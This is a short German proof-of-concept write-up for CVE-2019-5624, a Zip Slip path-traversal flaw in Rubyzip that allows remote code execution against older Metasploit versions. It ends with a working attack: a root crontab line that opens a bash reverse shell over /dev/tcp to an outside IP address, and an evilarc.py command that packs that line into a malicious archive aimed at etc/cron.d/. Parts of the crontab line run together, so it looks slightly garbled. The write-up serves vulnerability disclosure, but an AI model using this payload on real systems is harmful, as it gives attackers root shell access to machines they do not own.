
Ein Proof of Concept für Metasploits CVE-2019-5624-Schwachstelle (Rubyzip unsichere ZIP-Behandlung RCE)
Ein Proof of Concept für die Metasploit-Sicherheitslücke CVE-2019-5624 (Rubyzip unsichere ZIP-Verarbeitung RCE)
Im Februar 2019 fand ich eine neue Sicherheitslücke in der Rubyzip-Bibliothek. Sie ermöglicht einem Angreifer, unsichere ZIP-Verarbeitung (Zip Slip) auszunutzen, was zu einer Remote-Code-Ausführung führt.
Diese Sicherheitslücke wurde gegen alle Metasploit-Versionen < 5.0.18 genutzt (Metasploit Wrap-Up).
Ich habe einen detaillierten Blogbeitrag verfasst, der die Sicherheitslücke erklärt.
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
python evilarc.py exploit --os unix -p etc/cron.d/